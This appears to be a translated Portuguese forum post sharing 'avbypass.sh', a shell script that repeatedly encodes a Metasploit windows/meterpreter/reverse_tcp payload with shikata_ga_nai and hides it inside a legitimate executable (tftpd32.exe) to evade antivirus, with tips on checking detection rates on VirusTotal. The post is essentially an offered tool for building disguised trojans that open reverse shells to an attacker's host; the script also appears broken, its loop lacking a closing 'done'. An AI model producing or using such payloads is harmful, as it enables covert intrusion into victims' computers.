Script 4 AV bypass meterpreters

avbypass.sh


Cria uma série de arquivos para ignorar um Antivirus.A maioria dos Antivirus encontram um trojan no arquivo do meterpreter. avbypass.sh é um script simples que usa outro .exe para esconder o trojan no arquivo sendo codificado x-vezes. É interessante, por exemplo, você codificá-lo duas vezes e enviar ao site VirusTotal - Free Online Virus and Malware Scan reportando se 5/41 scanners encontraram um trojan, você codificá-lo então em 3 vezes e virustotal.com irá reportar entre 7/41 scanners encontrando o trojam. Portanto, este script cria um "x" número de arquivos que você pode conferir Jotti's malware scan (19 AV scanners) ou VirusTotal - Free Online Virus and Malware Scan (41 AV scanners).


Use o script em

#sh avbypass.sh 10.0.0.1 2222 4 /root/testfile

Code:
#!/bin/sh
# (C)opyright 2010 - pigtail23
# AVbypass Creator v. 1.0 (2010-06-06)
#msfpayload windows/meterpreter/reverse_tcp LHOST=$1 LPORT=$2 R | msfencode -c $c -e x86/shikata_ga_nai -x -->>> /pentest/windows-binaries/tools/tftpd32.exe <<<-- -t exe > $4$c.exe
#/pentest/windows-binaries/tools/tftpd32.exe <--- you can use a file of your choise

echo "sh avbypass.sh <IP> <Port> <Number of times to encode> <Filename>"

if [[ $1 ]]; then echo "IP:" $1 ; else echo "IP not set"; exit 0; fi
if [[ $2 ]]; then echo "Port:" $2 ; else echo "Port not set"; exit 0; fi
if [[ $3 ]]; then echo "Number:" $3 ; else echo "Set Number"; exit 0; fi
if [[ $4 ]]; then echo "Filename:" $4 ; else echo "Set Filename"; exit 0; fi
echo "File/-s creating. Pls Wait..."

for (( c=1; c<=$3; c++ ))
do

msfpayload windows/meterpreter/reverse_tcp LHOST=$1 LPORT=$2 R | msfencode -c $c -e x86/shikata_ga_nai -x /pentest/windows-binaries/tools/tftpd32.exe -t exe > $4$c.exe

echo "File" $4$c".exe was created."

pronto

Espero que este script ajudá-lo a verificar e criar seus arquivos mais rápido.


pigtail23

fonte: http://www.backtrack-linux.org/forum...erpreters.html
Tradução e Adaptação firebits